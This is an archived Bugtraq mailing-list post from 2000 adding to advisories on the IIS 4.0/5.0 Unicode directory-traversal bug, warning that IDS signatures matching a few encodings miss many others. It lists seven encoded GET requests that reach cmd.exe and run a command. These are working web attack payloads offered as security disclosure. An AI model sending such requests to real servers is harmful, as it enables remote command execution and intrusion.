[17279] in bugtraq
[LoWNOISE] addendum %c1%1c IIS 4.0/5.0 Remote command execution
daemon@ATHENA.MIT.EDU (ET LoWNOISE)
Fri Oct 20 12:00:09 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.SUN.3.96.1001020031647.22762A-100000@grex.cyberspace.org>
Date: Fri, 20 Oct 2000 03:30:48 -0400
Reply-To: ET LoWNOISE <et@CYBERSPACE.ORG>
From: ET LoWNOISE <et@CYBERSPACE.ORG>
X-To: rain forest puppy <rfp@WIRETRIP.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.10.10010181821070.8710-100000@eight.wiretrip.net>
Hola,
Just a quick note to add.
Too many people are now just creating new signatures on their IDS to
"protect" their servers based on the recents advisories where appears only
exploit information with:
%c1%1c
%c0%af
%c1%9c
Is just a misunderstanding there are too many ways to exploit this
bug..doing a quick search :
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir (C-1-PC)
this is just in the range c0 00 to c2 00...!
Efrain 'ET' Torres
[LoWNOISE] Colombia
et@cyberspace.org
